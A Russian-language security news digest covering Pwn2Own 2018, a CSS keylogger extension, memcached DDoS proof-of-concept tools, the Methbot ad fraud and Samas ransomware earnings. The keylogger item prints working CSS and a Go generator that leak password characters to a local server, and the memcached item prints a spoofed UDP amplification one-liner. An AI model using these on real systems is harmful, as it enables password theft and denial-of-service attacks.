На турнире хакеров взломали популярные веб-браузеры и macOS

Во время ежегодного турнира хакеров Pwn2Own 2018, прошедшего в Канаде в рамках конференции CanSecWest, специалисты по кибербезопасности со всего мира пытались найти уязвимости в программном обеспечении крупных корпораций. В частности, хакерам удалось успешно взломать веб-браузеры Microsoft, Mozilla и Apple.



В рамках первого дня состязания Ричард Чжу наглядно показал использование целой серии уязвимостей в браузере Edge, за что получил $70 000. Никлас Баумштарк из Phoenhex продемонстрировал рабочий метод взлома VirtualBox, заработав $27 000, а Сэмюэл Гросс из той же команды сумел скомпрометировать Safari, получив за это $65 000.

На следующий день вновь отметился Ричард Чжу, который сумел взломать Firefox при помощи уязвимости в самом браузере и ядре Windows. За эту находку он получил ещё $50 000. Хакеру присудили звание Master of Pwn за самые значимые находки.


Также в течение второго дня специалисты из Ret2 Systems сумели взломать Safari путём использования цепочки эксплойтов, но получилось это у них только с четвёртого раза, поэтому награду специалисты не получили. Отметилась и команда MWR Labs, которая путём переполнения буфера хипа сумела взломать Safari и применить атаку типа Uninitialized Stack Variable в операционной системе macOS, заработав $55 000.

Всего в этом году специалисты заработали $267 000 при общем призовом фонде в $2 000 000. Для сравнения, в прошлом году хакеры обнаружили 51 уязвимость, получив $833 000, а годом ранее размер общего выигрыша составил $460 000 за 21 эксплойт.

Как сообщается, в этом году многие специалисты не смогли участвовать в конкурсе. Часть «сошла с дистанции», так как Microsoft в мартовском обновлении безопасности закрыла многие уязвимости. А китайским участникам и вовсе запретили участвовать в этом состязании власти Китая, объясняя это тем, что специалисты не должны открыто делиться информацией об уязвимостях — только напрямую с разработчиками ПО.

Кейлоггер на CSS

  • CSS
Независимый разработчик Макс Чихаб (Max Chehab) поделился своим CSS-кейлоггером на GitHub. Инструмент представлен в виде расширения для браузера Chrome.

Принцип работы
Используя селекторы атрибутов, можно запрашивать ресурсы с внешнего сервера под видом загрузки фонового изображения.

Например, следующий CSS выберет все формы ввода с типом password и значением value, заканчивающимся на «а», и затем попытается загрузить фотографию из localhost:3000/a:
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
С помощью простого скрипта можно создать CSS-файл, который будет посылать опциональные запросы для каждого символа ASCII:
package main

import (
	"fmt"
	"log"
	"net/url"
	"os"
)

func main() {
	fmt.Println("Building keylogger.css")

	output, err := os.Create("./css-keylogger-extension/keylogger.css")
	if err != nil {
		log.Fatal("Cannot create output", err)
	}
	defer output.Close()
	for c := 32; c < 128; c++ {
		value := fmt.Sprintf("%c", c)
		urlValue := url.QueryEscape(value)

		if value == `"` {
			value = `\"`
		} else if value == `}` {
			value = `\\}`
		} else if value == `\` {
			value = `\\`
		}
		fmt.Fprintf(output, `input[type="password"][value$="%v"] { background-image: url("http://localhost:3000/%v"); }`, value, urlValue)
		fmt.Fprintf(output, "\n")
	}
	fmt.Println("Complete.")
}

Как пользоваться?
  • Открыть веб-сайт, использующий компонентный фреймворк вроде React (например, instagram.com).
  • Нажать на расширение C в правом верхнем углу на любой странице.
  • Ввести свой пароль.
  • Пароль будет перехвачен express-сервером.

Подробности по установке и настройке расширения можно найти в источнике.

Каскадные таблицы стилей становятся популярным инструментом для проведения хакерских атак. Напомним, что в январе был создан прототип системы для отслеживания ряда пользовательских действий на чистом CSS. А в начале февраля у исследователей получилось использовать CSS для кражи токенов CRSF и персональных данных.

В Сеть выложили коды, запускающие DDoS-атаки через серверы Memcached

Заинтересованные специалисты опубликовали собственные варианты реализации DDoS-атак через заражённые серверы Memcached. Массовая злоумышленная кампания захватила уже более 17 000 IP-адресов и до сих пор не ликвидирована. Атаки достигают рекордных размеров.

Proof-of-Concept
Всего исследователи представили три различных способа использовать скомпрометированные устройства:
скрипт на языке Python под названием Memcrashed, сканирующий поисковую систему Shodan на наличие IP захваченных серверов Memcached и позволяющий запускать DDoS-атаку на любое желаемое устройство буквально за несколько секунд:


код на Си из репозитория Pastebin, опубликованный вместе со списком из 17 000 IP уязвимых серверов и извлекающий из него адреса для проведения атаки:

небольшой эксплойт, уместившийся в один твит:


UDP 50,000x AMP attack IP-Spoof POC. syntax args: <victim_ip> <memecache_ip>

use Socket;socket R,2,3,255;setsockopt R,0,1,1;send R,pack("H*x4H*a4a4H*Z*",45000019,"52110000",(map{inet_aton$_}@ARGV),"fefe2bcb0017"."0"x14,"\x01\x00\x00stats\r\n"),0,pack"Sna4x8",2,60,pop
Memcached-кампания пока только развивается. Напомним, что несколько дней назад жертвой атак стал GitHub — наплыв запросов «положил» его на 9 минут.

Хакеры зарабатывают до $5 млн в день на интернет-рекламе

Эксперты из США пожаловались о миллионных заработках российских «мошенников».

Группа российских хакеров разработала мошенническую схему, используемую для обмана крупных компаний и СМИ, размещающих рекламу в интернете. В рамках операции мошенники ежедневно зарабатывают от $3 млн до $5 млн, утверждается в докладе компании White Ops, специализирующейся на безопасности и защите рынка интернет-рекламы.
Схема, получившая название Methbot, начала функционировать в сентябре 2015 года, однако значительный размах приобрела только в октябре текущего года. За схемой стоит группировка, которую эксперты называют Ad Fraud Komanda или «AFK13». Как отмечается, хакеры продумали каждую деталь. Мошенники создали более 250 тыс. фальшивых сайтов, якобы принадлежащих крупным компаниям и издательствам (ESPN, Vogue, New York Times, The Wall Street Journal, Verizon и пр.).

За счет использования большого количества IP-адресов, поддельных учетных записей в соцсетях, манипуляции данными о геолокации, имитации «клика» или движения мыши, мошенники создают иллюзию того, могут привлекать миллионы людей к просмотру видеороликов. За это они получают крупные суммы от заказчиков (в основном из США).
Помимо прочего, злоумышленники используют более 570 тыс. ботов для создания видимости просмотра материалов на фальшивых интернет-страницах. По данным White Ops, ежедневно боты «просматривают» порядка 300 млн рекламных видеороликов. В среднем плата за тысячу просмотров составляет чуть больше $13. Как сообщается, хакеры используют 800-1200 выделенных серверов, расположенных в США и Нидерландах.
Читать дальше

Авторы вымогателя Samas заработали более $450 000 за год

Первые данные о шифровальщике, известном под названиями Samas, SamSa, Kazi или RDN/Ransom, появились в марте 2016 года, когда малварь атаковала ряд американских компаний, в основном работающих в сфере здравоохранения. Вскоре после этого исследователи Microsoft Malware Protection Center сообщили, что корни угрозы уходят в 2015 год.

Специалисты Microsoft объясняли, что Samas отличается от Locky, Cerber и прочих популярных на сегодняшний день вымогателей. Авторы шифровальщика Samas предпочли другую схему работы: они упирают не на количество зараженных пользователей, но прицельно атакуют корпоративные сети. Для этих целей злоумышленники применяют инструменты для пентестов, обнаруживают ненадежные учтенные данные RDP, а также эксплуатируют различные бреши, например, в Java-серверах. Зачастую шифровальщик доставляется в целевые системы в буквальном смысле вручную.

Целями атакующих становятся различные компании и организации, способные выплатить огромный выкуп. Сумма выкупа значительно превышает стандартные требования Locky, CryptoWall и других вымогателей. Чем крупнее компания, тем больше денег требуют хакеры.

В свежем отчете аналитики Palo Alto Networks пишут, что за последние 12 месяцев им удалось обнаружить и исследовать лишь 60 уникальных образцов семейства Samas, что значительно меньше, чем у других шифровальщиков. Для каждой новой атаки злоумышленники используют немного другую версию Samas, часто меняют биткоин-кошельки и усложняют реверс-инжиниринг малвари. Эволюцию версий вредоноса за последний год, в том числе внутренние .NET имена проектов, можно увидеть на иллюстрации ниже.

Хакер: Авторы вымогателя Samas заработали более 0 000 за год

Отслеживая биткоин-адреса операторов шифровальщика, исследователи Palo Alto Networks сумели подсчитать примерный доход преступной группы. Транзакции были зафиксированы для 19 различных кошельков, и их суммарный объем составил 607 биткоинов, что по текущему курсу равняется приблизительно $450 000. При этом исследователи признают, что у них на руках имеются не все образчики Samas, а в графике платежей, который можно увидеть ниже, присутствует большой пробел (с июня по октябрь 2016 года).

Хакер: Авторы вымогателя Samas заработали более 0 000 за год

«За прошедший год операторы SamSa не прекращали свои атаки. Они успешно скомпрометировали ряд организаций и продолжают пожинать значительные плоды своих усилий. Так как группировка продолжает зарабатывать деньги, вряд ли в ближайшее время они остановятся», — резюмируют исследователи.
Читать дальше